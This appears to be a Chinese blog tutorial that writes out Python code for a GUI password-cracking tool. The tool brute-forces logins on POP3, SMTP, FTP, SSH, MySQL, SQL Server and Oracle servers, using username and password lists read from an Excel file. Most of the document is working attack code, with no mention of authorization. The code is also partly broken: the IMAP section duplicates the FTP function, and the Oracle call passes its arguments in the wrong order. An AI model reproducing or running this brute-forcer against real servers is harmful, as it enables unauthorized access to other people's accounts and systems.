之前我们完成了密码PJ工具的界面,今天我们来看看功能实现吧。
目录
编码
提交——功能实现
首先我们先完成“提交”功能的实现,“提交”按钮的作用是将用户填写的服务器地址、服务器端口和协议类型信息存储起来,用于后面的密码验证。所以我们先定义了一个字典(因为oracle的数据库连接必须要实例名,所以我们新增了一个db_name)。
1 dic_list = {'server_ip':'','server_port':'','pro':'','db_name':""}获取服务器地址和端口我们定义了一个回调函数gettext,将两个Entry对象传递过来后,直接使用一个get命令就可以将Entry中的内容取出来,同时我们添加了对IP和端口的合法性校验。
1 def gettext(x,y): 2 """ 3 获取输入框内容 4 :param x: 输入框对象——服务器IP 5 :param y: 输入框对象——服务器端口 6 :return: 7 """ 8 server_ip = x.get() 9 server_port = y.get()10 #判断输入的IP和端口是否合法11 if (not re.match("[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+.?",server_ip)):12 tkinter.messagebox._show(title="IP输入不合法", message='请重新输入合法IP')13 # elif not(re.match("^?:([1-6][0-9]{1,4})|([1-9][0-9]{0,3})$",server_port)):14 elif not(re.match("^[1-9]$|(^[1-9][0-9]$)|(^[1-9][0-9][0-9]$)|(^[1-9][0-9][0-9][0-9]$)|(^[1-6][0-5][0-5][0-3][0-5]$)$",server_port)):15 tkinter.messagebox._show(title="端口输入不合法", message='请重新输入合法端口')16 else:17 dic_list["server_port"] = server_port18 dic_list["server_ip"] = server_ip19 print(dic_list["server_ip"],dic_list["server_port"])对于协议类型的读取,我们定义了一个回调函数get_select,同时我们对协议是否选择进行判断,若没有选择则提示重新选择协议。
1 def get_select(y,list_pro): 2 """ 3 获取列表的选择 4 :param y:列表框对象 5 :param list_pro:列表 6 """ 7 for i in range(0, len(list_pro)): 8 if y.selection_includes(i): 9 #补充dic_list字典中的协议字段内容10 dic_list["pro"] = list_pro[i]11 else:12 pass13 if dic_list["pro"]=="":14 tkinter.messagebox._show(title="协议未选择", message='请重新破解协议')15 elif dic_list["pro"]=='Oracle':16 dic_list['db_name']=getInput("Oracle实例","请输入Oracle实例信息")17 print(dic_list['db_name'])同时我们添加了一个对oracle协议的判断,若选择oracle协议则需要弹出一个窗口填写数据库实例名称。我们新增了一个弹框输入的函数get_Input进行调用。
1 def getInput(title, message): 2 def return_callback(event): 3 print('quit...') 4 root.quit() 5 ? 6 def close_callback(): 7 tkinter.messagebox.showinfo('message', 'no click...') 8 ? 9 root = tkinter.Tk(className=title)10 root.wm_attributes('-topmost', 1)11 screenwidth, screenheight = root.maxsize()12 width = 30013 height = 10014 size = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)15 root.geometry(size)16 root.resizable(0, 0)17 lable = tkinter.Label(root, height=2)18 lable['text'] = message19 lable.pack()20 entry = tkinter.Entry(root)21 entry.bind('<Return>', return_callback)22 entry.pack()23 entry.focus_set()24 root.protocol("WM_DELETE_WINDOW", close_callback)25 root.mainloop()26 str = entry.get()27 root.destroy()28 return str这样我们的“提交”按钮功能就全部完成了。接下来我们看看“开始破解”菜单按钮的功能。
开始破解——功能实现
我们定义了一个回调函数为mimapojie
- 首先会读取密码字典
- 然后是选择协议并执行破解动作
- 最后是展示破解结果
1 def mimapojie(server_ip,server_port,pro):2 get_user_and_passwd('./test.xls', 0)3 print_list = choice_protocol(server_ip, int(server_port), pro,dic_list['db_name'])4 #展示破解结果5 tkinter.messagebox._show(title='破解结果',message=dic_list['pro'],detail=print_list)接下来我们依次看看这三个方面都是如何实现的。
读取密码字典
我们使用的是我们之前文章中使用的读取Excel表格的方式,我们直接将第一列的内容读取到user_list列表中,将第二列内容读取到password_list列表中。
1 def get_user_and_passwd(file_path, sheet_id): 2 """ 3 获取密码库中的用户名密码 4 :param file_path: 密码库的路径及文件名 5 :param sheet_id: 密码库中的sheet id 6 """ 7 read_excel = ReadAndWriteExcel.OpenExcel(file_name=file_path, sheet_id=sheet_id) 8 rows = read_excel.get_lines() 9 global user_list10 global password_list11 for i in range(0, rows):12 if read_excel.get_value(i, 0):13 user_list.append(read_excel.get_value(i, 0))14 if read_excel.get_value(i, 1):15 password_list.append(read_excel.get_value(i, 1))选择协议并执行破解动作
我们定义了一个选择协议函数,根据获取到的选择协议字段执行不同的破解函数。
1 def choice_protocol(server_ip,server_port, pro,db_name): 2 """ 3 选择需要破解的协议 4 :param server_ip:需要破解的服务器IP 5 :param server_port:需要破解的服务器端口 6 :param pro: 需要破解的协议 7 :param db_name: oracle数据库的实例名 8 """ 9 if pro == "POP3":10 attempt_pop(server_ip, server_port)11 elif pro == "IMAP":12 print('this is a test')13 attempt_imap(server_ip, server_port)14 elif pro == "SMTP":15 attempt_smtp(server_ip, server_port)16 elif pro == "FTP":17 attempt_ftp(server_ip, server_port)18 elif pro == "SSH":19 attempt_ssh(server_ip, server_port)20 elif pro == 'MySql':21 attempt_mysql(server_ip, server_port)22 elif pro == "SQL Server":23 attempt_mssql(server_ip, server_port)24 elif pro == "Oracle":25 attempt_oracle(server_ip, server_port,db_name)26 ?27 return print_listPOP3协议的破解函数
1 def attempt_pop(server_ip, server_port): 2 """ 3 破解POP3协议的用户名密码 4 :param server_ip: 破解的服务器IP 5 :param server_port: 破解的服务器端口 6 """ 7 print("=======破解POP3协议========") 8 print_list.clear() 9 for i in range(0, len(user_list)):10 for j in range(0, len(password_list)):11 try:12 pop3_server = poplib.POP3(host=server_ip,port=server_port)13 pop3_server.user(user_list[i])14 pop3_server.pass_(password_list[j])15 #获取邮件列表,用于判断是否登录成功16 pop3_server.list()17 print_list.append("用户名:%s,密码:%s登录成功n" % (user_list[i], password_list[j]))18 except:19 pass20 if not print_list:21 print_list.append("密码破解失败")IMAP协议的破解函数
1 def attempt_ftp(server_ip,port=21): 2 """ 3 破解FTP协议的用户名密码 4 :param server_ip: 破解的服务器IP 5 :param port: 破解的服务器端口,默认为21 6 """ 7 ftp = FTP() 8 ftp.connect(server_ip, port) 9 global print_list10 print_list.clear()11 for i in range(0, len(user_list)):12 for j in range(0, len(password_list)):13 try:14 ftp.login(user_list[i], password_list[j])15 ftp.quit()16 print_list.append("用户名:%s,密码:%s登录成功n" % (user_list[i], password_list[j]))17 except:18 pass19 if not print_list:20 print_list.append("密码破解失败")SMTP协议的破解函数
1 def attempt_smtp(mail_host, port=25): 2 """ 3 破解SMTP协议的用户名密码 4 :param mail_host: 破解的服务器IP 5 :param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码 6 :param port: 破解服务器的端口,默认为25 7 """ 8 print("=======破解SMTP协议========") 9 ?10 global user_list11 global password_list12 print_list.clear()13 for i in range(0, len(user_list)):14 for j in range(0, len(password_list)):15 try:16 smtpObj = smtplib.SMTP(timeout=3)17 smtpObj.set_debuglevel(0)18 smtpObj.connect(mail_host, port) # 25 为 SMTP 端口 19 smtpObj.login(user_list[i], password_list[j])20 print_list.append("用户名:%s,密码:%s登录成功n" % (user_list[i], password_list[j]))21 except Exception as e:22 print(e)23 pass24 if not print_list:25 print_list.append("密码破解失败")FTP协议的破解函数
1 def attempt_ftp(server_ip,port=21): 2 """ 3 破解FTP协议的用户名密码 4 :param server_ip: 破解的服务器IP 5 :param port: 破解的服务器端口,默认为21 6 """ 7 ftp = FTP() 8 ftp.connect(server_ip, port) 9 global print_list10 print_list.clear()11 for i in range(0, len(user_list)):12 for j in range(0, len(password_list)):13 try:14 ftp.login(user_list[i], password_list[j])15 ftp.quit()16 print_list.append("用户名:%s,密码:%s登录成功n" % (user_list[i], password_list[j]))17 except:18 pass19 if not print_list:20 print_list.append("密码破解失败")SSH协议的破解函数
def attempt_ssh(server_ip, port=22): """ 破解SSH协议的用户名密码 :param server_ip: 破解的服务器IP :param port: 破解的服务器端口,默认为22 """ print("=======破解SSH协议========") ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) global user_list global password_list print_list.clear() for i in range(0, len(user_list)): for j in range(0, len(password_list)): try: ssh.connect(hostname=server_ip, port=port, username=user_list[i], password=password_list[j]) print_list.append("用户名:%s,密码:%s登录成功n" % (user_list[i], password_list[j])) except: pass if not print_list: print_list.append("密码破解失败")MySQL协议的破解函数
def attempt_mysql(server_ip, server_port=3306,db_name='mysql'): """ 破解MySQL协议的用户名密码 :param server_ip: 破解的服务器IP :param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码 """ print("=======破解MYSQL协议========") global user_list global password_list print_list.clear() for i in range(0, len(user_list)): for j in range(0, len(password_list)): try: # pymysql.connect(host=server_ip,port=server_port,user=user_list[i],passwd=password_list[j],db=db_name) db = pymysql.connect(server_ip, user_list[i], password_list[j]) db.close() print_list.append("用户名:%s,密码:%s登录成功n" % (user_list[i], password_list[j])) except: pass if not print_list: print_list.append("密码破解失败")SQL server协议的破解函数
def attempt_mssql(server_ip, server_port): """ 破解SQL server协议的用户名密码 :param server_ip: 破解的服务器IP :param server_port: 破解的服务器端口 """ print("=======破解SQL Server协议========") global user_list global password_list print_list.clear() for i in range(0, len(user_list)): for j in range(0, len(password_list)): try: db = pymssql.connect(server_ip,user_list[i],password_list[j]) db.close() # print("用户名:%s,密码:%s登录成功" % (user_list[i], password_list[j])) print_list.append("用户名:%s,密码:%s登录成功n" % (user_list[i], password_list[j])) except: pass if not print_list: print_list.append("密码破解失败")Oracle协议的破解函数
def attempt_oracle(server_ip,db_name, port=1521 ): """ 破解Oracle协议的用户名密码 :param server_ip: 破解的服务器IP :param show_flag: 标志位,True代表展示破解失败的用户名密码,False代表仅展示破解成功的用户名密码 :param port: 破解的服务器端口,默认为1521 """ print("=======破解Oracle协议========") global user_list global password_list print_list.clear() for i in range(0, len(user_list)): for j in range(0, len(password_list)): try: cx_Oracle.connect(user_list[i]+'/'+password_list[j]+'@'+server_ip+':'+str(port)+'/'+db_name) # print("用户名:%s,密码:%s登录成功" % (user_list[i], password_list[j])) print_list.append("用户名:%s,密码:%s登录成功n" % (user_list[i], password_list[j])) except Exception as e: pass if not print_list: print_list.append("密码破解失败")实现效果
这样我们的软件就实现了,我们看一下ftp协议和Oracle协议的破解效果吧。
FTP协议
页面填写
破解结果
Oracle协议
破解界面配置同ftp界面,点击“提交”后会弹出输入实例名的窗口,输入实例名并回车即可。
因为菜鸟小白没有搭建Oracle服务器所以破解失败的结果如下:
声明:本站部分文章及图片源自用户投稿,如本站任何资料有侵权请您尽早请联系jinwei@zod.com.cn进行处理,非常感谢!